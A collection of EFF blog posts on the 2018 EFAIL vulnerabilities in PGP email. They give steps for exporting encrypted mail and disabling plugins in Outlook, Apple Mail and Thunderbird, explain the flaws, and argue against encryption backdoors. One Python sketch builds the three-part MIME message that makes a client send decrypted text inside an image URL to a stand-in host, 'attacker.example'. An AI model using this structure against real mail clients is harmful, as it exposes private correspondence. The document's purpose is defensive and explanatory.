Surveillance Self-Defense Blog

Exporting PGP-Encrypted Email From Outlook

After disabling the GpgOL plugin, you will need to save encrypted messages as files on your hard drive in order to view them later on.

1. Select the encrypted message.

2. Right-click the file ending in “.asc”, then click “Save As.”

3. Click on “Desktop” to choose where you will save the file. Type “encrypted” for the filename, and click “Save.”

For certain older PGP messages (PGP Inline), you will not see files to download. These steps may have to be altered for those messages.

For instructions on reading the saved file, see Using the Command Line to Decrypt a Message on Windows.
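If you want a preview of what that tutorial will have you do, here is a minimal sketch that simply calls the gpg command-line tool from Python. It assumes Gpg4win's gpg is on your PATH and that the attachment was saved as "encrypted.asc" on your Desktop; adjust the path and filename to match your system.

```python
import subprocess
from pathlib import Path

# Assumed location and filename from the steps above; change these if you
# saved the attachment elsewhere or under a different name.
saved = Path.home() / "Desktop" / "encrypted.asc"

# gpg prompts for your passphrase (via pinentry) and prints the plaintext.
subprocess.run(["gpg", "--decrypt", str(saved)], check=True)
```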

These notes are based on Outlook 2016 and Windows 10.

Exporting PGP-Encrypted Email From Apple Mail

After disabling the GPGTools plugin for Apple Mail, you will need to save encrypted messages as files on your hard drive in order to view them later on.

1. Select the encrypted message. (Note: If you have followed the instructions for disabling GPG in Apple Mail correctly, you will see the still-encrypted message body rather than the email with a note that it was decrypted.)

2. Click the “View” menu in the menu bar on the top of the screen, and select “Message”, and then select “Raw Source.”

3. The Raw Source of the email will open in a new window. You will be able to see the email headers, as well as the encrypted message. The full encrypted message will be bookended by “-----BEGIN PGP MESSAGE-----” and “-----END PGP MESSAGE-----”. This whole block, from the first hyphen before BEGIN to the last hyphen after END, is the encrypted message.


4. To save this email as a file, click the “File” menu in the menu bar on the top of the screen, and select “Save As...”

5. Select Desktop in the “Where” drop-down. Choose a filename you will remember, keeping the .eml extension; by default, this will be the full subject line of the original email. We recommend a short, one-word, all-lowercase name such as “encrypted.eml” to make it easier to follow along with our command-line reading tutorial.


6. Once you hit “Save”, the file should appear on your Desktop (or wherever you chose to save it). (Note: Your macOS Desktop may hide the file extension; the file still ends in “.eml”.)


For instructions on reading the saved .eml file, see Using the Command Line to Decrypt a Message on MacOS.

Exporting PGP-Encrypted Email From Thunderbird

After disabling Enigmail, you will need to save encrypted messages as files on your hard drive in order to view them later on.

These instructions will work on most desktop operating systems.

1. Select the encrypted message.

2. Click on the hamburger menu (the three horizontal lines).

3. Hover over “Save As” on the left side of the menu pop-up.

4. Click on “File.”

5. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make the command-line step easier.

6. You can place this anywhere on your hard drive that makes the most sense to you, but to simplify following along in our command-line decryption tutorials, we suggest saving on the Desktop.

For instructions on reading the saved .eml file, follow the link below that matches your operating system.

How to read PGP-encrypted email on the command line:

Using the Command Line to Decrypt a Message on Windows
Using the Command Line to Decrypt a Message on MacOS
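As a rough preview of those tutorials, the sketch below shells out to gpg from Python, assuming GnuPG is installed and the message was saved as “encrypted.eml” on your Desktop; gpg skips the mail headers and locates the armored block on its own.

```python
import subprocess
from pathlib import Path

desktop = Path.home() / "Desktop"

# gpg finds the -----BEGIN PGP MESSAGE----- block inside the .eml file,
# prompts for your passphrase, and writes the plaintext to decrypted.txt.
subprocess.run(
    ["gpg", "--output", str(desktop / "decrypted.txt"),
     "--decrypt", str(desktop / "encrypted.eml")],
    check=True,
)
```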

Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

Don’t panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now.

A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days.

Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now.

Because we are awaiting the security community's response to the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now. Sending PGP-encrypted emails to unpatched clients also creates adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers.

While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn’t important whether the sender or the receiver of the original secret message is targeted. This is because a PGP message is encrypted to both of their keys.

At EFF, we have relied on PGP extensively both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email.

Our recommendations may change as new information becomes available, and we will update this post when that happens.

How The Vulnerabilities Work

PGP, which stands for “Pretty Good Privacy,” was first released nearly 27 years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP transformed the level of privacy protection available for digital communications, and has provided tech-savvy users with the ability to encrypt files and send secure email to people they’ve never met. Its strong security has protected the messages of journalists, whistleblowers, dissidents, and human rights defenders for decades. While PGP is now a privately-owned tool, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts, and is described in the OpenPGP Internet standards document.

The paper describes a series of vulnerabilities that all have in common their ability to expose email contents to an attacker when the target opens a maliciously crafted email sent to them by the attacker. In these attacks, the attacker has obtained a copy of an encrypted message but is unable to decrypt it on their own.

The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.
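To make the shape of the attack concrete, here is a simplified sketch of the three-part message structure the paper describes. It is not a working exploit, just an illustration of why concatenated HTML rendering is dangerous: attacker.example is a placeholder domain, and the middle part is plain text standing in for a real PGP/MIME-encrypted body part.

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart("mixed")
# Part 1: HTML that opens an image tag but never closes its URL.
msg.attach(MIMEText('<img src="http://attacker.example/', "html"))
# Part 2: stand-in for the previously captured PGP ciphertext, which the
# victim's client will transparently decrypt.
msg.attach(MIMEText("-----BEGIN PGP MESSAGE----- ... -----END PGP MESSAGE-----", "plain"))
# Part 3: HTML that closes the image tag.
msg.attach(MIMEText('">', "html"))

# A vulnerable client decrypts part 2, renders all three parts as one HTML
# document, and the plaintext lands inside the image URL, so the client
# "loads the image" by sending the plaintext to the attacker's server.
print(msg.as_string())
```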

The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously captured ciphertext. Here are some technical details of the vulnerability, in plain-as-possible language:

When you encrypt a message to someone else, it scrambles the information into “ciphertext” such that only the recipient can transform it back into readable “plaintext.” But with some encryption algorithms, an attacker can modify the ciphertext, and the rest of the message will still decrypt back into the correct plaintext. This property is called malleability. This means that they can change the message that you read, even if they can’t read it themselves.
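Here is a toy demonstration of malleability using a simple XOR stream cipher (PGP actually uses CFB mode, which is malleable in a related, blockwise way). The attacker never learns the key, yet rewrites the message:

```python
import os

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key_stream = os.urandom(16)              # secret, known only to the endpoints
plaintext  = b"PAY ALICE  $0100"
ciphertext = xor_bytes(key_stream, plaintext)

# The attacker knows (or guesses) the original wording, but not the key.
# XORing the ciphertext with (old XOR new) rewrites the hidden message.
tampered = xor_bytes(ciphertext, xor_bytes(b"PAY ALICE  $0100", b"PAY MALLORY$9999"))

print(xor_bytes(key_stream, tampered))   # b'PAY MALLORY$9999'
```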

To address the problem of malleability, modern encryption algorithms add mechanisms to ensure integrity, or the property that assures the recipient that the message hasn’t been tampered with. But the OpenPGP standard says that it’s ok to send a message that doesn’t come with an integrity check. And worse, even if the message does come with an integrity check, there are known ways to strip off that check. Plus, the standard doesn’t say what to do when the check fails, so some email clients just tell you that the check failed, but show you the message anyway.
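What an integrity check buys you can be sketched with an HMAC over the message, a stand-in for OpenPGP's modification detection code (the encryption itself is omitted to keep the example short). A client that verifies before displaying refuses to show a tampered message at all:

```python
import hmac, hashlib

MAC_KEY = b"shared-integrity-key"        # toy value for the example

def seal(message: bytes) -> tuple[bytes, bytes]:
    return message, hmac.new(MAC_KEY, message, hashlib.sha256).digest()

def open_sealed(message: bytes, tag: bytes) -> bytes:
    if not hmac.compare_digest(hmac.new(MAC_KEY, message, hashlib.sha256).digest(), tag):
        # The safe behavior when the check fails: show nothing at all.
        raise ValueError("integrity check failed; refusing to display message")
    return message

message, tag = seal(b"attack at dawn")
try:
    open_sealed(b"attack at dusk", tag)  # attacker-modified copy
except ValueError as err:
    print(err)
```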

The second vulnerability takes advantage of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext whose integrity check fails. Since the OpenPGP standard did not specify what to do when the check fails, some software incorrectly displays the message anyway, enabling this attack.

This means that not only can attackers get access to the contents of your encrypted messages the second you open an email, but they can also use these techniques to get access to the contents of any encrypted message that you have ever sent, as long as they have a copy of the ciphertext.

What's Being Done to Fix This Vulnerability

It’s possible to fix the specific exploits that allow messages to be exfiltrated: namely, do better than the standard says by not rendering messages if their integrity checks don’t check out. Updating the protocol and patching vulnerable software applications would address this specific issue.

Fixing this entirely is going to take time. Some software patches have already begun rolling out, but it will be some time before every user of every affected application is up to date, and even longer before the standards are updated. Right now, information security researchers and the coders of OpenPGP-based systems are poring over the research paper to determine the scope of the flaw.

We are in an uncertain state, where it is hard to promise the level of protection users can expect of PGP without giving a fast-changing and increasingly complex set of instructions and warnings. PGP usage was always complicated and error-prone; with this new vulnerability, it is currently almost impossible to give simple, reliable instructions on how to use it with modern email clients.

It is also hard to tell people to move off using PGP in email permanently. There is no other email encryption tool that has the adoption levels, multiple implementations, and open standards support that would allow us to recommend it as a complete replacement for PGP. (S/MIME, the leading alternative, suffers from the same problems and is more vulnerable to the attacks described in the paper.) There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives.

We Need To Be Better Than Pretty Good

The flaw that the researchers exploited in PGP was known for many years as a theoretical weakness in the standard—one of many initially minor problems with PGP that have grown in significance over its long life.

You can expect a heated debate over the future of PGP, strong encryption, and even the long-term viability of email. Many will use today’s revelations as an opportunity to highlight PGP’s numerous issues with usability and complexity, and demand better. They’re not wrong: our digital world needs a well-supported, independent, rock-solid public key encryption tool now more than ever. Meanwhile, the same targeted populations who really need strong privacy protection will be waiting for the steps they can take to use email securely once again.

We’re taking this latest announcement as a wake-up call to everyone in the infosec and digital rights communities: not to pile on recriminations or criticisms of PGP and its dedicated, tireless, and largely unfunded developers and supporters, but to unite and work together to re-forge what it means to be the best privacy tool for the 21st century. While EFF is dialing down our use of PGP for the time being (and recommend you do so too) we’re going to double-down on supporting independent, strong encryption—whether that comes from a renewed PGP, or from integrating and adapting the new generation of strong encryption tools for general purpose use. We’re also going to keep up our work improving the general security of the email ecosystem with initiatives like STARTTLS Everywhere.

PGP in its current form has served us well, but “pretty good privacy” is no longer enough. We all need to work on really good privacy, right now.

EFF’s recommendations:

Disable or uninstall PGP email plugins for now.
Do not decrypt encrypted PGP messages that you receive. Instead, use non-email-based messaging platforms, like Signal, for your encrypted messaging needs.
Use offline tools to decrypt PGP messages you have received in the past.
Check our Surveillance Self-Defense site for updates regarding client patches and improved secure messaging systems.

Disabling PGP in Outlook with Gpg4win

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Outlook requires running the Gpg4win installer again so that you can choose not to have the GpgOL plug-in on your system. Your existing keys will remain available on your machine.

1. Download and open the Gpg4win installer.

2. You’ll then see the Gpg4win installer intro page. Click “Next.”

3. Uncheck “GpgOL” from the dialog, but keep all the other options the same. Click “Next.”

4. Click “Install.”  It will now install to the specified location without Outlook integration.

5. Click “Finish.”

Once the GpgOL plugin for Outlook is disabled, your emails will not be automatically decrypted in Outlook.

These notes are based on Outlook 2016 and Windows 10.

Disabling PGP in Apple Mail with GPGTools

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Apple Mail requires deleting a “bundle” file used by the application. Your existing keys will remain available on your machine.

1. First, click the Mail icon in the Dock.

2. Click “Mail” in the menu bar on the top of the screen, and select “Quit Mail.” This is to make sure it’s shut down completely before we continue.

3. Click the Finder icon in the Dock.

4. Click the “Go” menu in the menu bar on the top of the screen, and select “Go to Folder…”

5. This will open the “Go to Folder” window. Type this exact text: /Library/Mail/Bundles

6. At this point, you may see a folder with the “GPGMail.mailbundle” file. (If you don’t, return to step 4, and in step 5 instead type exactly ~/Library/Mail/Bundles. You can type the ~ (tilde) character by holding shift and pressing the ` key, located directly below Esc on most keyboards.)

7. Move the file “GPGMail.mailbundle” to the trash, either by dragging it to the trash icon in the Dock or by right-clicking it and selecting “Move to Trash.”

8. At this point, you may be prompted to type your macOS administrator password. Type it in, and hit the “enter” key.

You may see the file deletion dialog displayed on the screen.

Once the GPGMail.mailbundle file is in your trash, your emails will not be automatically decrypted in Apple Mail.
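If you want to double-check that the bundle really is gone from both places Apple Mail looks, this small Python snippet (run with python3 in Terminal) inspects the two folders used in steps 5 and 6 above:

```python
from pathlib import Path

# The system-wide and per-user Bundles folders from steps 5 and 6.
for base in (Path("/Library/Mail/Bundles"), Path.home() / "Library/Mail/Bundles"):
    bundle = base / "GPGMail.mailbundle"
    print(f"{bundle}: {'still present' if bundle.exists() else 'not found'}")
```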

Disabling PGP in Thunderbird with Enigmail

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Thunderbird only requires disabling the Enigmail add-on. Your existing keys will remain available on your machine.

1. First, click on the Thunderbird hamburger menu (the three horizontal lines).

2. Select “Add-Ons” from the right side of the menu that appears.

3. This will open the add-ons tab. Click “Disable” in the “Enigmail” row.

Your Thunderbird instance will now be disconnected from PGP.

Once the Enigmail plugin is disabled, your emails will not be automatically decrypted in Thunderbird.


Attention PGP Users: New Vulnerabilities Require You To Take Action Now

A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.

Please refer to these guides on how to temporarily disable PGP plug-ins in:

Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win

These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community.

We will release a more detailed explanation and analysis when more information is publicly available.

Bring In The Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate Staff

Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door briefing for Senate staff about the realities of device encryption. While policymakers hear frequently from the FBI and the Department of Justice about the dangers of encryption and the so-called Going Dark problem, they very rarely hear from actual engineers, cryptographers, and computer scientists. Indeed, the usual suspects testifying before Congress on encryption are nearly the antithesis of technical experts.

The all-star lineup of panelists included Dr. Matt Blaze, professor of computer science at the University of Pennsylvania; Dr. Susan Landau, professor of cybersecurity and policy at Tufts University; Erik Neuenschwander, Apple’s manager of user privacy; and EFF’s tech policy director Dr. Jeremy Gillula.

EFF Tech Policy Director Dr. Jeremy Gillula (far left) and Legislative Analyst India McKinney (far right) joined an all-star lineup of panelists to brief Senate staff on encryption.

The discussion focused on renewed calls by the FBI and DOJ to create mechanisms to enable “exceptional access” to encrypted devices. EFF's legislative analyst India McKinney opened the briefing by assuring staff that the goal of the panel was not to attack the FBI’s proposals from the perspective of policy or ideology. Instead, our goal was to give a technical description of how device encryption actually works and answer staff questions about the risks that exceptional access mechanisms necessarily introduce into the ecosystem.

Dr. Blaze framed his remarks around what he called an undeniable “cybersecurity crisis” gripping the critical information systems we all rely on. Failures and data breaches are a daily occurrence that only come to the public’s attention when they reach the catastrophic scale of the Equifax breach. As Blaze pointed out, “security is hard,” and the presence of bugs and unintended behavior in software is one of the oldest and most fundamental problems in computer science. These issues only become more intense as systems get more complex, giving rise to an “arms race” between those who find and fix vulnerabilities in software and those who exploit them.

According to Blaze, the one bright spot is the increasing deployment of encryption to protect sensitive data, but these encryption mechanisms remain “fragile.” Implementing encryption at scale remains an incredibly complex engineering task. Blaze said that computer scientists “barely have their heads above water,” and proposals that would mandate law enforcement access to encrypted data would effectively take away one of the very few tools for managing the security of infrastructure that our country has come to depend on. These proposals make the system more complex and drastically increase the attack surface exposed to outside attackers.

Blaze noted that the CLEAR key escrow system put forth by former Microsoft CTO Ray Ozzie, recently written up in Wired, only covers a cryptographic protocol—“the easy part”—which itself has already been demonstrated to be flawed. Even if those flaws could be satisfactorily addressed, the enormous difficulty of developing and implementing that protocol in complex, real-world systems would remain. Surmounting these challenges, Blaze said, would require a breakthrough so momentous that it would lead to the creation of a Nobel Prize in computer science just so it could be adequately recognized.

Professor Landau began her remarks by pointing out that this is not at all a new debate: Professor Blaze was one of the technical experts who broke the NSA’s Clipper Chip proposal in the 1990s, and key escrow as the Clipper Chip described it really isn’t much different from modern calls for extraordinary access. Turning to the most current key escrow proposal, Ozzie’s CLEAR, Professor Landau noted that crypto algorithms are built through exhaustive peer review. CLEAR, however, had its most public presentation in Wired magazine and has yet to be subjected to that rigor; it addresses only a tiny portion of the systems problem that “exceptional access” presents, and the proposal has already been substantially discredited.

Professor Landau concluded by noting that the National Academies of Sciences study showed that the very first two questions we need to ask about an “extraordinary access” mechanism are whether it works at scale and what security risks it imposes. The FBI has steadfastly ignored both of those problems.

“We’re not looking at privacy versus security. Instead, we’re looking at efficiency of law enforcement investigations versus security, and there are other ways of improving the efficiency of investigations without harming security,” Landau said. “Complexity is the enemy of security. If you want a phone that’s unlockable by any government, you might as well not lock the phone in the first place.”

Apple’s Neuenschwander presented an on-the-ground look at how Apple weighs tradeoffs between functionality and user privacy. In the case of encryption of iPhones, he echoed the concerns raised by both Blaze and Landau about the complexity of implementing secure systems, noting that Apple must continually work to improve security as attackers become more sophisticated. As a result, Apple determined that the best—and only—way to secure user data was to simply take itself out of the equation by not maintaining control of any encryption keys. By contrast, if Apple were to keep a store of keys to decrypt users’ phones, that vault would immediately become a massive target, no matter what precautions Apple took to protect it. Though the days of the Wild West are long gone, Neuenschwander pointed out that bank robberies remain quite prevalent: about 4,200 in 2016 alone. Why? Because that’s where the money is. Any exceptional access proposal would take Apple from a regime of storing zero keys to holding many keys, making it a ripe target for digital bank robbery.

EFF’s Dr. Gillula spoke last. He opened by explaining that getting encryption right is hard. Really hard. That’s not because cryptographers spend years working on a particular cryptographic mechanism and succeed; rather, they spend years and years working on systems that other cryptographers are able to break in mere minutes. Sometimes those flaws are in the encryption algorithm itself, but much more often they are in the engineering implementation of that algorithm.

And that’s what companies like Cellebrite and Grayshift do. They sell devices that break device security—not by breaking the encryption on the device—but by finding flaws in implementation. Indeed, there are commercial tools available that can break into every phone on the market today. The recent OIG report acknowledged exactly that: there were elements within the FBI that knew that there were options other than forcing Apple to build an exceptional access system.

In conclusion, Gillula noted that in the cat-and-mouse game that is computer security, mandating exceptional access would freeze the defenders’ state of the art, while allowing attackers to progress without limit.

We were impressed by the questions the Senate staffers asked and by their high level of engagement. Despite the fact that we’ve entered the third decade of the “Crypto Wars,” this appears to be a debate that’s not going away any time soon. But we were glad for the opportunity to bring such a powerful panel of experts to give Senate staff the unfiltered technical lowdown on encryption.

Related Cases: Apple Challenges FBI: All Writs Act Order (CA)

There is No Middle Ground on Encryption

Encryption is back in the headlines again, with government officials insisting that they still need to compromise our security via a backdoor for law enforcement. Opponents of encryption imagine that there is a “middle ground” approach that allows for strong encryption but with “exceptional access” for law enforcement. Government officials claim that technology companies are creating a world where people can commit crimes without fear of detection.

Despite this renewed rhetoric, most experts continue to agree that exceptional access, no matter how you implement it, weakens security. The terminology might have changed, but the essential question has not: should technology companies be forced to develop a system that inherently harms their users? The answer hasn’t changed either: no.

Let us count the reasons why. First, if mandated by the government, exceptional access would violate the First Amendment under the compelled speech doctrine, which prevents the government from forcing an individual, company, or organization to make a statement, publish certain information, or even salute the flag.

Second, mandating that tech companies weaken their security puts users at risk. In the 1990s, the White House introduced the Clipper Chip, a plan for building backdoors into communications technologies. A security researcher found enormous security flaws in the system, showing that a brute-force attack could likely compromise the technology.

Third, exceptional access would harm U.S. businesses and chill innovation. The United States government can’t stop the development of encryption technologies; it can merely push that development overseas.

Finally, exceptional access fails at its one stated task—stopping crime. No matter what requirements the government placed on U.S. companies, sophisticated criminals could still get strong encryption from non-U.S. sources that aren’t subject to that type of regulation.

There’s No Such Thing as a Safe Backdoor

Despite the broad consensus among technology experts, some policymakers keep trying to push an impossible “middle ground.” Last month, after years of research, the National Academy of Sciences released a report on encryption and exceptional access that conflated the question of whether the government should mandate “exceptional access” to the contents of encrypted communications with the question of how the government could possibly accomplish this mandate without compromising user security. Noted crypto expert Susan Landau worried that some might misinterpret the report as providing evidence that an exceptional access system is close to being securely built:

"The Academies report does discuss approaches to ‘building ... secure systems’ that provide exceptional access—but these are initial approaches only…The presentations to the Academies committee were brief descriptions of ideas by three smart computer scientists, not detailed architectures of how such systems would work. There's a huge difference between a sketch of an idea and an actual implementation—Leonardo da Vinci’s drawings for a flying machine as opposed to the Wright brothers’ plane at Kitty Hawk."

And it didn’t stop with the NAS. Also last month, the international think-tank EastWest Institute published a report that proposed “two balanced, risk-informed, middle-ground encryption policy regimes in support of more constructive dialogue.”

Finally, just last week, Wired published a story featuring former Microsoft chief technology officer Ray Ozzie and his attempt to find an exceptional access model for phones that can supposedly satisfy “both law enforcement and privacy purists.” While Ozzie may have meant well, experts like Matt Green, Steve Bellovin, Matt Blaze, Rob Graham and others were quick to point out its substantial flaws. No system is perfect, but a backdoor system for billions of phones magnifies the consequences of a flaw, and even the best and brightest in computer security don’t know how to make a system bug-free.

The reframing keeps coming, but the truth remains. Any efforts for “constructive dialogue” neglect a major obstacle: the government’s starting point for this dialogue is diametrically opposed to the very purpose of encryption. To see why, read on.

Encryption: A User’s Guide to Keys

Encryption is frequently described using analogies to “keys”—whoever has a key can decrypt, or read, information that is behind a “lock.” But if we back up, we can see the problems with that metaphor.

In ancient times, encryption was achieved using sets of instructions that we now call “unkeyed ciphers,” which explained how to both scramble and unscramble messages. These ciphers sometimes used simple rules, like taking alphanumeric text and then rotating every letter or number forward by one, so A becomes B, B becomes C, and so on. Ciphers can also use more complex rules, like translating a message’s letters to numbers, and then running those numbers through a mathematical equation to get a new string of numbers that—so long as the cipher is unknown—is indecipherable to an outside party.
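For instance, a rotate-by-one rule fits in a few lines of Python, and because there is no key, anyone who knows the rule can undo it by rotating back:

```python
def rotate(text: str, shift: int = 1) -> str:
    """Unkeyed rotation cipher: A->B, B->C, ..., Z->A, and 0->1, ..., 9->0."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        elif ch.isdigit():
            out.append(str((int(ch) + shift) % 10))
        else:
            out.append(ch)
    return "".join(out)

scrambled = rotate("MEET AT 9")       # 'NFFU BU 0'
print(rotate(scrambled, shift=-1))    # back to 'MEET AT 9'
```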

As encryption progressed, early cryptographers started to use “keyed ciphers” with ever-stronger security. These ciphers use secret information called a “key” to control the ability to encrypt and decrypt.

Keys continue to play a major role in modern encryption, but there is more than one kind of key.

Some digital devices encrypt stored data, and the password entered to operate the device unlocks the random key used to encrypt that data. But for messages between people—like emails or chats—all modern encryption systems are based on “public key encryption.” The advantage of this form of encryption is that the people communicating don’t have to have a secret (like a password) in common ahead of time.
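The device-storage model in the first sentence can be sketched like this, assuming the third-party cryptography package; the password, salt, and iteration count are invented for the example. A random data key encrypts the stored data, and a key derived from your password only wraps (encrypts) that data key:

```python
import base64, hashlib
from cryptography.fernet import Fernet  # pip install cryptography

data_key = Fernet.generate_key()                      # random key that encrypts the data
stored_data = Fernet(data_key).encrypt(b"contents of the disk")

# A key derived from the password wraps (encrypts) the data key itself.
wrapping_key = base64.urlsafe_b64encode(
    hashlib.pbkdf2_hmac("sha256", b"correct horse battery", b"per-device-salt", 200_000)
)
wrapped_data_key = Fernet(wrapping_key).encrypt(data_key)

# Unlocking the device: re-derive the wrapping key from the typed password,
# unwrap the data key, then decrypt the data.
recovered_key = Fernet(wrapping_key).decrypt(wrapped_data_key)
print(Fernet(recovered_key).decrypt(stored_data))     # b'contents of the disk'
```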

In public key encryption, each user—which can be a person or an entity, like a company, a website, or a network server—gets two related keys. (Sometimes, more than one pair is generated.) There is one key to encrypt data, and another key to decrypt data. The key that encrypts data is called the “public key,” and it can be shared with anyone. It’s sort of like a public instruction set—anyone who wishes to send encrypted messages to a person can use that person’s public instruction set to encrypt data according to those rules. The second key is called a “private key,” and it is never shared. This private key decrypts data that has been encrypted using the corresponding public key.

In modern encryption, these keys aren’t used for encrypting and decrypting messages themselves. Instead, the keys are used to encrypt and decrypt an entirely separate key that, itself, both encrypts and decrypts data. This separate key, called a session key, is used with a traditional symmetric cipher—it represents a secret set of instructions that can be used by a message sender and receiver to scramble and unscramble a message.

Public key encryption ensures that a session key is secure and can’t be intercepted and used by outsiders. Private keys hold the secret to session keys, which hold the secret to encrypted messages. The fewer opportunities for private encryption keys to be stolen or accidentally released, the greater the security.
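Putting the pieces together, here is a hedged sketch of the whole hybrid scheme, again assuming the third-party cryptography package; RSA-OAEP and Fernet stand in for whatever algorithms a real OpenPGP implementation would negotiate:

```python
from cryptography.fernet import Fernet            # pip install cryptography
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Recipient: generate a key pair and publish the public half.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Sender: encrypt the message with a fresh session key, then encrypt
# ("wrap") the session key itself with the recipient's public key.
session_key = Fernet.generate_key()
encrypted_message = Fernet(session_key).encrypt(b"meet me at noon")
wrapped_session_key = public_key.encrypt(session_key, OAEP)

# Recipient: only the private key can unwrap the session key, which in
# turn decrypts the message.
recovered = private_key.decrypt(wrapped_session_key, OAEP)
print(Fernet(recovered).decrypt(encrypted_message))   # b'meet me at noon'
```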

Yet this is precisely what exceptional access demands—more keys, more access, and more vulnerability. Exceptional access, at its core, erodes encryption security, granting law enforcement either its own set of private keys for every encrypted device and individual who sends and receives encrypted messages, or requiring the creation—and secure storage—of duplicate keys to be handed over.

And that’s why law enforcement’s proposals for a “responsible solution” are irresponsible. Any system that includes a separate channel for another party to access it is inherently less secure than a system that does not have that channel. In encryption systems, the very existence of duplicated or separate, devoted keys makes those keys attractive for bad actors. It would be like creating duplicate, physical keys for a bank vault—the risk of one of those keys getting lost, or stolen, is bad enough. Copying that key (for law enforcement agencies in the U.S. and potentially around the globe) multiplies the risk.

There is no good faith compromise in the government’s exceptional access request. The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption.

In a 2017 interview with Politico (paywall), Deputy Attorney General Rod Rosenstein conceded that a device with exceptional access “would be less secure than a product that didn’t have that ability.” He continued:

“And that may be, that’s a legitimate issue that we can debate—how much risk are we willing to take in return for the reward?”

The answer to that question has to be informed by solid information about what we risk when we give up strong encryption. So this week EFF is bringing the nerds (aka technologists) to Washington, D.C. to host an informative briefing for Senate staffers. We need all policymakers to get this right, and not fall prey to rhetoric over reality.


Related Cases: Apple Challenges FBI: All Writs Act Order (CA)
